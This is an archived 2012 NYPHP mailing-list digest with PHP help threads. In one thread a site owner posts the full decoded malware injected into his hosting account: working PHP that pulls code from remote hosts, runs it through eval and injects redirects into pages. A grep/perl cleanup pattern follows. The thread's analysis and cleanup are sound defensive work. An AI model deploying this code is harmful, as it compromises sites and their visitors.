From rainelemental at gmail.com Sat Feb 18 13:43:59 2012 From: rainelemental at gmail.com (Federico Ulfo) Date: Sat, 18 Feb 2012 13:43:59 -0500 Subject: [nycphp-talk] Share up! Message-ID: PHP ninjas I'd like to spend some good time with you sharing skills about Continuos Integration (CI), Amazon (AWS) and other kick ass stuff around PHP. What about next week at Tea Lounge (Park Slope)? -------------- next part -------------- An HTML attachment was scrubbed... URL: From krook at us.ibm.com Mon Feb 20 10:48:03 2012 From: krook at us.ibm.com (Daniel Krook) Date: Mon, 20 Feb 2012 10:48:03 -0500 Subject: [nycphp-talk] Share up! In-Reply-To: References: Message-ID: Hi Federico, > PHP ninjas I'd like to spend some good time with you sharing skills > about Continuos Integration (CI), Amazon (AWS) and other kick ass > stuff around PHP. What about next week at Tea Lounge (Park Slope)? Next Tuesday is the monthly NYPHP meeting in Manhattan, Justin DeMaris from Buddy Media is going to talk about AWS and some private cloud tech. http://www.nyphp.org/ Thanks, -Dan Daniel Krook Software Engineer, Advanced Cloud Technology, GTS, IBM IBM Level 2 Certified IT Specialist - Java EE, PHP, BlackBerry, DB2 & Solaris Certified -------------- next part -------------- An HTML attachment was scrubbed... URL: From tuon1 at netzero.net Mon Feb 20 23:14:22 2012 From: tuon1 at netzero.net (tuon1 at netzero.net) Date: Tue, 21 Feb 2012 04:14:22 GMT Subject: [nycphp-talk] mssql_connect() problem Message-ID: <20120220.221422.26068.0@webmail08.dca.untd.com> I'm a novice in mssql world and just getting started to learn how to program mssql in PHP. I'm having trouble getting PHP to execute my code below. It seems that PHP doesn't recorgnize mssql_connect() as the error message stated so. See the error message following the code. Can anyone tell me what's wrong with it? Thanks in advance. Paul Here's the error message: Fatal error: Call to undefined function mssql_connect() in E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on line 8 ____________________________________________________________ Refinance for 2.125%/2.989% APR Loans under 729K usually qualify for US GOV backed refinance programs http://thirdpartyoffers.netzero.net/TGL3231/4f431a3e6ff417faea6st04duc -------------- next part -------------- An HTML attachment was scrubbed... URL: From sbritton at gmail.com Mon Feb 20 23:20:35 2012 From: sbritton at gmail.com (Stephen Britton) Date: Mon, 20 Feb 2012 23:20:35 -0500 Subject: [nycphp-talk] mssql_connect() problem In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com> References: <20120220.221422.26068.0@webmail08.dca.untd.com> Message-ID: Change: $localhost="db40442xxx.db.example.com"; to $localhost="localhost"; And that should fix it. On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote: > I'm a novice in mssql world and just getting started to learn how to > program mssql in PHP. I'm having trouble getting PHP to execute my code > below. It seems that PHP doesn't recorgnize mssql_connect() as the error > message stated so. See the error message following the code. > > Can anyone tell me what's wrong with it? > > Thanks in advance. > > Paul > > $database="db40442xxx"; > $localhost="db40442xxx.db.example.com"; > $username="dbo40442xxx"; > $password="databasepass1"; > > /* Initialize and connect the database */ > $conn = mssql_connect($localhost, $username, $password); //Line 8 > if (!$conn) > { > die('Could not connect: ' . mssql_get_last_message()); > } > mssql_select_db($database, $conn) or die( "Unable to select database. " . > mssql_get_last_message()); > > ?> > > Here's the error message: > > > Fatal error: Call to undefined function mssql_connect() in > E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php > on line 8 > > > ____________________________________________________________ > *Refinance for 2.125%/2.989% APR* > Loans under 729K usually qualify for US GOV backed refinance programs > > theeasyloansite.com > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -- Stephen Britton Technology Consultant sbritton at gmail.com Twitter: @StephenBritton ph: 914-661-0040 "Life isn't about finding yourself. Life is about creating yourself." - George Bernard Shaw -------------- next part -------------- An HTML attachment was scrubbed... URL: From cvasquez39 at gmail.com Mon Feb 20 23:27:38 2012 From: cvasquez39 at gmail.com (Charles Vasquez) Date: Mon, 20 Feb 2012 23:27:38 -0500 Subject: [nycphp-talk] mssql_connect() problem In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com> References: <20120220.221422.26068.0@webmail08.dca.untd.com> Message-ID: HI all, Paul. You may also want to check you systems path variable for php.ini. You may also want to examine phpinfo for the location of the php.ini file. One thing that worked for me is to copy the php.ini file from the directory resides in currently c:\Windows directory. Hope this helps, Charles On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote: > I'm a novice in mssql world and just getting started to learn how to > program mssql in PHP. I'm having trouble getting PHP to execute my code > below. It seems that PHP doesn't recorgnize mssql_connect() as the error > message stated so. See the error message following the code. > > Can anyone tell me what's wrong with it? > > Thanks in advance. > > Paul > > $database="db40442xxx"; > $localhost="db40442xxx.db.example.com"; > $username="dbo40442xxx"; > $password="databasepass1"; > > /* Initialize and connect the database */ > $conn = mssql_connect($localhost, $username, $password); //Line 8 > if (!$conn) > { > die('Could not connect: ' . mssql_get_last_message()); > } > mssql_select_db($database, $conn) or die( "Unable to select database. " . > mssql_get_last_message()); > > ?> > > Here's the error message: > > > Fatal error: Call to undefined function mssql_connect() in > E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php > on line 8 > > > ____________________________________________________________ > *Refinance for 2.125%/2.989% APR* > Loans under 729K usually qualify for US GOV backed refinance programs > > theeasyloansite.com > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From rakics at gmail.com Tue Feb 21 05:39:20 2012 From: rakics at gmail.com (Sasa Rakic - Gmail) Date: Tue, 21 Feb 2012 11:39:20 +0100 Subject: [nycphp-talk] mssql_connect() problem In-Reply-To: References: <20120220.221422.26068.0@webmail08.dca.untd.com> Message-ID: <011701ccf085$12bd8a70$38389f50$@gmail.com> Hi Paul, >From path it seems that you have windows installed, could you please Tell me does in your PHP ini you have this three lines uncommented: Commented ; extension=php_mssql.dll Uncommented: [PHP_MSSQL] extension=php_mssql.dll extension=php_sqlsrv.dll extension=php_pdo_sqlsrv.dll Best regards, Sasa From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Charles Vasquez Sent: Tuesday, February 21, 2012 5:28 AM To: NYPHP Talk Subject: Re: [nycphp-talk] mssql_connect() problem HI all, Paul. You may also want to check you systems path variable for php.ini. You may also want to examine phpinfo for the location of the php.ini file. One thing that worked for me is to copy the php.ini file from the directory resides in currently c:\Windows directory. Hope this helps, Charles On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote: I'm a novice in mssql world and just getting started to learn how to program mssql in PHP. I'm having trouble getting PHP to execute my code below. It seems that PHP doesn't recorgnize mssql_connect() as the error message stated so. See the error message following the code. Can anyone tell me what's wrong with it? Thanks in advance. Paul Here's the error message: Fatal error: Call to undefined function mssql_connect() in E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on line 8 ____________________________________________________________ Refinance for 2.125%/2.989% APR Loans under 729K usually qualify for US GOV backed refinance programs theeasyloansite.com _______________________________________________ New York PHP User Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/show-participation -------------- next part -------------- An HTML attachment was scrubbed... URL: From chsnyder at gmail.com Tue Feb 21 10:41:34 2012 From: chsnyder at gmail.com (Chris Snyder) Date: Tue, 21 Feb 2012 10:41:34 -0500 Subject: [nycphp-talk] mssql_connect() problem In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com> References: <20120220.221422.26068.0@webmail08.dca.untd.com> Message-ID: On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote: > Can anyone tell me what's wrong with it? > Fatal error: Call to undefined function mssql_connect() in > E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on > line 8 Call to undefined function implies that your version of PHP was compiled without support for MSSQL. Take a look at this page for the probable reason: http://us3.php.net/manual/en/intro.mssql.php, and/or see the Installing/Configuring page in the same section. Chris Snyder http://chxor.chxo.com/ From ron at vnetworx.net Tue Feb 21 20:19:47 2012 From: ron at vnetworx.net (Ron Guerin) Date: Tue, 21 Feb 2012 20:19:47 -0500 Subject: [nycphp-talk] OS X home directory PHP-CLI Message-ID: <4F4442B3.5010403@vnetworx.net> I don't have a Mac, and I haven't turned up much useful in Google, so I'm hoping someone here has written a CLI PHP script for OS X. I understand that you can't count on HOME to be set. Is there a reliable way to find the user's home directory on OS X in PHP? - Ron From rainelemental at gmail.com Tue Feb 21 20:26:32 2012 From: rainelemental at gmail.com (Federico Ulfo) Date: Tue, 21 Feb 2012 20:26:32 -0500 Subject: [nycphp-talk] OS X home directory PHP-CLI In-Reply-To: <4F4442B3.5010403@vnetworx.net> References: <4F4442B3.5010403@vnetworx.net> Message-ID: $home_dir = exec( "cd ~ pwd" ); On Tue, Feb 21, 2012 at 8:19 PM, Ron Guerin wrote: > I don't have a Mac, and I haven't turned up much useful in Google, so > I'm hoping someone here has written a CLI PHP script for OS X. > > I understand that you can't count on HOME to be set. Is there a > reliable way to find the user's home directory on OS X in PHP? > > - Ron > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmarscher at beaffinitive.com Wed Feb 22 00:01:51 2012 From: rmarscher at beaffinitive.com (Rob Marscher) Date: Wed, 22 Feb 2012 00:01:51 -0500 Subject: [nycphp-talk] OS X home directory PHP-CLI In-Reply-To: References: <4F4442B3.5010403@vnetworx.net> Message-ID: <2589D9F4-AB7B-48DC-A543-07CA0185853B@beaffinitive.com> > On Tue, Feb 21, 2012 at 8:19 PM, Ron Guerin wrote: > I don't have a Mac, and I haven't turned up much useful in Google, so > I'm hoping someone here has written a CLI PHP script for OS X. > > I understand that you can't count on HOME to be set. Is there a > reliable way to find the user's home directory on OS X in PHP? On Feb 21, 2012, at 8:26 PM, Federico Ulfo wrote: > $home_dir = exec( "cd ~ > pwd" ); FWIW, $_ENV['HOME'] is set on my laptop. Here's Federico's technique on one line with backticks: $home = `cd ~; pwd`; -------------- next part -------------- An HTML attachment was scrubbed... URL: From david at davidmintz.org Fri Feb 24 13:07:29 2012 From: david at davidmintz.org (David Mintz) Date: Fri, 24 Feb 2012 13:07:29 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack Message-ID: My Dreamhost shared hosting account just had its *.php injected with some garbage. People were getting stuff about "CHEAP High Quality Christian Louboutin replica shoes, pumps and boots." Someone also reported to me that he was redirected to a porn site. I also found a slew of images and all kinds of... stuff. I changed my shell password, and I did this: egrep -lr '<\?php.+eval$base64_decode\("[^"]+"$\);\?>' *| xargs perl -i -p -e 's/<\?php.+eval$base64_decode\("[^"]+"$\);\?>//' which appears to have purged everything of the injected code. (I am pretty confident that I have never used eval(base64_decode()) for any purpose myself.) Now I kinds of regret not saving a few of the compromised files for study. Any other suggestions as to what I should do? Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what. I do know Dreamhost had a well-publicized security compromise recently. The php injection that happened to me seems to have happened on Feb 21, based on the file modification times. You can lecture me about being a fool to use Dreamhost if you like. Thanks. -- David Mintz http://davidmintz.org/ It ain't over: http://www.healthcare-now.org/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From rainelemental at gmail.com Fri Feb 24 13:23:17 2012 From: rainelemental at gmail.com (federico ulfo) Date: Fri, 24 Feb 2012 13:23:17 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: References: Message-ID: <6666163227676099757@unknownmsgid> Search for any type of form in your web folder, that's a common way to upload new php files! I could search for any occourrence of exec, system and eval as well! Good luck Sent from my iPhone On Feb 24, 2012, at 1:07 PM, David Mintz wrote: My Dreamhost shared hosting account just had its *.php injected with some garbage. People were getting stuff about "CHEAP High Quality Christian Louboutin replica shoes, pumps and boots." Someone also reported to me that he was redirected to a porn site. I also found a slew of images and all kinds of... stuff. I changed my shell password, and I did this: egrep -lr '<\?php.+eval$base64_decode\("[^"]+"$\);\?>' *| xargs perl -i -p -e 's/<\?php.+eval$base64_decode\("[^"]+"$\);\?>//' which appears to have purged everything of the injected code. (I am pretty confident that I have never used eval(base64_decode()) for any purpose myself.) Now I kinds of regret not saving a few of the compromised files for study. Any other suggestions as to what I should do? Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what. I do know Dreamhost had a well-publicized security compromise recently. The php injection that happened to me seems to have happened on Feb 21, based on the file modification times. You can lecture me about being a fool to use Dreamhost if you like. Thanks. -- David Mintz http://davidmintz.org/ It ain't over: http://www.healthcare-now.org/ _______________________________________________ New York PHP User Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/show-participation -------------- next part -------------- An HTML attachment was scrubbed... URL: From ronald.bradford at gmail.com Fri Feb 24 13:35:50 2012 From: ronald.bradford at gmail.com (Ronald Bradford) Date: Fri, 24 Feb 2012 11:35:50 -0700 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: <6666163227676099757@unknownmsgid> References: <6666163227676099757@unknownmsgid> Message-ID: Have you compared your code with a backup before the injection date, or the last version of code from your version control system. On Feb 24, 2012 12:24 PM, "federico ulfo" wrote: > Search for any type of form in your web folder, that's a common way to > upload new php files! > > I could search for any occourrence of exec, system and eval as well! > > Good luck > > Sent from my iPhone > > On Feb 24, 2012, at 1:07 PM, David Mintz wrote: > > My Dreamhost shared hosting account just had its *.php injected with some > garbage. People were getting stuff about "CHEAP High Quality Christian > Louboutin replica shoes, pumps and boots." Someone also reported to me that > he was redirected to a porn site. I also found a slew of images and all > kinds of... stuff. > > I changed my shell password, and I did this: > > egrep -lr '<\?php.+eval$base64_decode\("[^"]+"$\);\?>' *| xargs > perl -i -p -e 's/<\?php.+eval$base64_decode\("[^"]+"$\);\?>//' > > which appears to have purged everything of the injected code. (I am pretty > confident that I have never used eval(base64_decode()) for any purpose > myself.) Now I kinds of regret not saving a few of the compromised files > for study. > > Any other suggestions as to what I should do? Unfortunately I do not know > how this happened; don't know if there is a huge vulnerability in one of > the apps up there that was exploited, or if it was an inside job, or what. > I do know Dreamhost had a well-publicized security compromise recently. The > php injection that happened to me seems to have happened on Feb 21, based > on the file modification times. > > You can lecture me about being a fool to use Dreamhost if you like. > > Thanks. > > -- > David Mintz > http://davidmintz.org/ > It ain't over: > http://www.healthcare-now.org/ > > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmarscher at beaffinitive.com Fri Feb 24 14:09:00 2012 From: rmarscher at beaffinitive.com (Rob Marscher) Date: Fri, 24 Feb 2012 14:09:00 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: References: Message-ID: <32F35E41-A55C-4CA4-8317-6B3E0029C44A@beaffinitive.com> On Feb 24, 2012, at 1:07 PM, David Mintz wrote: > Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what. Our company wordpress blog was compromised a few months ago due to a vulnerability in the "timthumb.php" image resizing script in one of the themes. http://www.terranetwork.net/blog/2011/08/new-vulnerability-in-many-wordpress-themes/ The hackers uploaded a couple files that trick the server by starting with a gif signature but then have php code in them. Those files than open a backdoor that allows for additional scripts to be uploaded that essentially give shell access to the compromised machine. In our case, the rest of the machine was locked down enough that no harm was done. Anyway, that might be something to look for. Good luck. -Rob -------------- next part -------------- An HTML attachment was scrubbed... URL: From david at davidmintz.org Fri Feb 24 16:04:00 2012 From: david at davidmintz.org (David Mintz) Date: Fri, 24 Feb 2012 16:04:00 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: References: <6666163227676099757@unknownmsgid> Message-ID: On Fri, Feb 24, 2012 at 1:35 PM, Ronald Bradford wrote: > Have you compared your code with a backup before the injection date, or > the last version of code from your version control system. > You mean, compared it in its newly sanitized state with a backup from before the attack? Er, not really. Most of what I have under this account is informal, hobby-type stuff and I have been remiss about full backups. I think I will change my ways. The eval(base64_decode()) stuff has been removed. I saved some for analysis' sake and have started looking at it, out of curiosity: if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) { $_SERVER['mr_no'] = 1; if (!function_exists('mrobh')) { function get_tds_777($url) { $content = ""; $content = @trycurl_777($url); if ($content !== false) return $content;$content = @tryfile_777($url); if ($content !== false) return $content;$content = @tryfopen_777($url); if ($content !== false) return $content;$content = @tryfsockopen_777($url); if ($content !== false) return $content;$content = @trysocket_777($url); if ($content !== false) return $content;return ''; } function trycurl_777($url) { if (function_exists('curl_init') === false) return false;$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_HEADER, 0); $result = curl_exec($ch); curl_close($ch); if ($result == "") return false;return $result; } function tryfile_777($url) { if (function_exists('file') === false) return false;$inc = @file($url); $buf = @implode('', $inc); if ($buf == "") return false;return $buf; } function tryfopen_777($url) { if (function_exists('fopen') === false) return false;$buf = ''; $f = @fopen($url, 'r'); if ($f) { while (!feof($f)) { $buf.=fread($f, 10000); }fclose($f); }else return false;if ($buf == "") return false;return $buf; } function tryfsockopen_777($url) { if (function_exists('fsockopen') === false) return false;$p = @parse_url($url); $host = $p['host']; $uri = $p['path'] . '?' . $p['query']; $f = @fsockopen($host, 80, $errno, $errstr, 30); if (!$f) return false;$request = "GET $uri HTTP/1.0\n"; $request.="Host: $host\n\n"; fwrite($f, $request); $buf = ''; while (!feof($f)) { $buf.=fread($f, 10000); }fclose($f); if ($buf == "") return false;list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function trysocket_777($url) { if (function_exists('socket_create') === false) return false;$p = @parse_url($url); $host = $p['host']; $uri = $p['path'] . '?' . $p['query']; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false;$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; }$request = "GET $uri HTTP/1.0\n"; $request.="Host: $host\n\n"; socket_write($sock, $request); $buf = ''; while ($t = socket_read($sock, 10000)) { $buf.=$t; }@socket_close($sock); if ($buf == "") return false;list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function update_tds_file_777($tdsfile) { $actual1 = $_SERVER['s_a1']; $actual2 = $_SERVER['s_a2']; $val = get_tds_777($actual1); if ($val == "") $val = get_tds_777($actual2);$f = @fopen($tdsfile, "w"); if ($f) { @fwrite($f, $val); @fclose($f); }if (strstr($val, "|||CODE|||")) { list($val, $code) = explode("|||CODE|||", $val); eval(base64_decode($code)); }return $val; } function get_actual_tds_777() { $defaultdomain = $_SERVER['s_d1']; $dir = $_SERVER['s_p1']; $tdsfile = $dir . "log1.txt"; if (@file_exists($tdsfile)) { $mtime = @filemtime($tdsfile); $ctime = time() - $mtime; if ($ctime > $_SERVER['s_t1']) { $content = update_tds_file_777($tdsfile); } else { $content = @file_get_contents($tdsfile); } } else { $content = update_tds_file_777($tdsfile); }$tds = @explode("\n", $content); $c = @count($tds) + 0; $url = $defaultdomain; if ($c > 1) { $url = trim($tds[mt_rand(0, $c - 2)]); }return $url; } function is_mac_777($ua) { $mac = 0; if (stristr($ua, "mac") || stristr($ua, "safari")) if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone"))) $mac = 1;return $mac; } function is_msie_777($ua) { $msie = 0; if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9")) $msie = 1;return $msie; } function setup_globals_777() { $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/"; $mz = "/tmp/"; if (!is_dir($rz)) { @mkdir($rz); if (is_dir($rz)) { $mz = $rz; } else { $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/"; if (!is_dir($rz)) { @mkdir($rz); if (is_dir($rz)) { $mz = $rz; } } else { $mz = $rz; } } } else { $mz = $rz; }$bot = 0; $ua = $_SERVER['HTTP_USER_AGENT']; if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;if (stristr($ua, "bingbot") || stristr($ua, "google")) $bot = 1;$msie = 0; if (is_msie_777($ua)) $msie = 1;$mac = 0; if (is_mac_777($ua)) $mac = 1;if (($msie == 0) && ($mac == 0)) $bot = 1; global $_SERVER; $_SERVER['s_p1'] = $mz; $_SERVER['s_b1'] = $bot; $_SERVER['s_t1'] = 1200; $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/"; $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d; $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d; $_SERVER['s_script'] = "mm.php?d=1"; } setup_globals_777(); if (!function_exists('gml_777')) { function gml_777() { $r_string_777 = ''; if ($_SERVER['s_b1'] == 0) $r_string_777 = ''; return $r_string_777; } } if (!function_exists('gzdecodeit')) { function gzdecodeit($decode) { $t = @ord(@substr($decode, 3, 1)); $start = 10; $v = 0; if ($t & 4) { $str = @unpack('v', substr($decode, 10, 2)); $str = $str[1]; $start+=2 + $str; } if ($t & 8) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 16) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 2) { $start+=2; } $ret = @gzinflate(@substr($decode, $start)); if ($ret === FALSE) { $ret = $decode; } return $ret; } } function mrobh($content) { @Header('Content-Encoding: none'); $decoded_content = gzdecodeit($content); if (preg_match('/\<\/body/si', $decoded_content)) { return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content); } else { return $decoded_content . gml_777(); } } ob_start('mrobh'); } } -- David Mintz http://davidmintz.org/ It ain't over: http://www.healthcare-now.org/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmarscher at beaffinitive.com Fri Feb 24 16:08:06 2012 From: rmarscher at beaffinitive.com (Rob Marscher) Date: Fri, 24 Feb 2012 16:08:06 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: References: <6666163227676099757@unknownmsgid> Message-ID: On Feb 24, 2012, at 4:04 PM, David Mintz wrote: ...snip... > ob_start('mrobh') ...snip... I did a little googling and found this pretty relevant article: http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmarscher at beaffinitive.com Fri Feb 24 16:11:03 2012 From: rmarscher at beaffinitive.com (Rob Marscher) Date: Fri, 24 Feb 2012 16:11:03 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: References: <6666163227676099757@unknownmsgid>

Message-ID: <3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com> On Feb 24, 2012, at 4:08 PM, Rob Marscher wrote: > On Feb 24, 2012, at 4:04 PM, David Mintz wrote: > ...snip... >> ob_start('mrobh') > ...snip... > > I did a little googling and found this pretty relevant article: > http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost > And another cleanup suggestion: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html -------------- next part -------------- An HTML attachment was scrubbed... URL: From david at davidmintz.org Fri Feb 24 16:12:41 2012 From: david at davidmintz.org (David Mintz) Date: Fri, 24 Feb 2012 16:12:41 -0500 Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack In-Reply-To: <3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com> References: <6666163227676099757@unknownmsgid>

<3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com> Message-ID: On Fri, Feb 24, 2012 at 4:11 PM, Rob Marscher wrote: > > On Feb 24, 2012, at 4:08 PM, Rob Marscher wrote: > > On Feb 24, 2012, at 4:04 PM, David Mintz wrote: > ...snip... > > ob_start('mrobh') > > ...snip... > > I did a little googling and found this pretty relevant article: > > http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost > > > And another cleanup suggestion: > > http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html > > > Very helpful! Thank you. -- David Mintz http://davidmintz.org/ It ain't over: http://www.healthcare-now.org/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From papillion at gmail.com Wed Feb 29 15:23:47 2012 From: papillion at gmail.com (Anthony Papillion) Date: Wed, 29 Feb 2012 14:23:47 -0600 Subject: [nycphp-talk] Compiling PHP 5+ Message-ID: I'm writing a command line tool that I want to compile so it can be used on systems that don't have PHP installed (specifically, Windows systems). Does anyone know of a tool that compiles PHP 5? Thanks! Anthony -------------- next part -------------- An HTML attachment was scrubbed... URL: From rainelemental at gmail.com Wed Feb 29 15:28:10 2012 From: rainelemental at gmail.com (Federico Ulfo) Date: Wed, 29 Feb 2012 15:28:10 -0500 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References: Message-ID: Facebook Hip Hop PHP, https://github.com/facebook/hiphop-php On Wed, Feb 29, 2012 at 3:23 PM, Anthony Papillion wrote: > I'm writing a command line tool that I want to compile so it can be used > on systems that don't have PHP installed (specifically, Windows systems). > Does anyone know of a tool that compiles PHP 5? > > Thanks! > Anthony > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From papillion at gmail.com Wed Feb 29 15:33:48 2012 From: papillion at gmail.com (Anthony Papillion) Date: Wed, 29 Feb 2012 14:33:48 -0600 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

Message-ID: On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo wrote: > > Facebook Hip Hop PHP, > https://github.com/facebook/hiphop-php Thank you! I'd completely forgotten about Hip Hop. Never had a chance to use it and got away from PHP for a few months. Good excuse to give it a try on my dive back in. Thanks again. Anthony From jeff at jeffslutz.com Wed Feb 29 15:35:21 2012 From: jeff at jeffslutz.com (Jeff Slutz) Date: Wed, 29 Feb 2012 15:35:21 -0500 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

Message-ID: Let us know what you find. I've been itching to give it a whirl too but haven't had the time or excuse yet. JS -- Jeff Slutz JSLEUTH LLC 3242 44th ST APT 3F Astoria, NY 11103 c. 970.443.9390 jeff at jeffslutz.com On Wed, Feb 29, 2012 at 3:33 PM, Anthony Papillion wrote: > On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo > wrote: > > > > Facebook Hip Hop PHP, > > https://github.com/facebook/hiphop-php > > Thank you! I'd completely forgotten about Hip Hop. Never had a chance > to use it and got away from PHP for a few months. Good excuse to give > it a try on my dive back in. Thanks again. > > Anthony > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From cvasquez39 at gmail.com Wed Feb 29 16:01:18 2012 From: cvasquez39 at gmail.com (Charles Vasquez) Date: Wed, 29 Feb 2012 16:01:18 -0500 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

Message-ID: what is hip hop? When you speak about compiling do you mean creating a windows dll or something? I am new to this type of speak, not new to php, but the php community. I practice php for personal purposes. Charles On Wed, Feb 29, 2012 at 3:35 PM, Jeff Slutz wrote: > Let us know what you find. I've been itching to give it a whirl too but > haven't had the time or excuse yet. > > JS > -- > Jeff Slutz > JSLEUTH LLC > 3242 44th ST APT 3F > Astoria, NY 11103 > c. 970.443.9390 > jeff at jeffslutz.com > > > > On Wed, Feb 29, 2012 at 3:33 PM, Anthony Papillion wrote: > >> On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo >> wrote: >> > >> > Facebook Hip Hop PHP, >> > https://github.com/facebook/hiphop-php >> >> Thank you! I'd completely forgotten about Hip Hop. Never had a chance >> to use it and got away from PHP for a few months. Good excuse to give >> it a try on my dive back in. Thanks again. >> >> Anthony >> _______________________________________________ >> New York PHP User Group Community Talk Mailing List >> http://lists.nyphp.org/mailman/listinfo/talk >> >> http://www.nyphp.org/show-participation >> > > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From papillion at gmail.com Wed Feb 29 16:41:04 2012 From: papillion at gmail.com (Anthony Papillion) Date: Wed, 29 Feb 2012 15:41:04 -0600 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

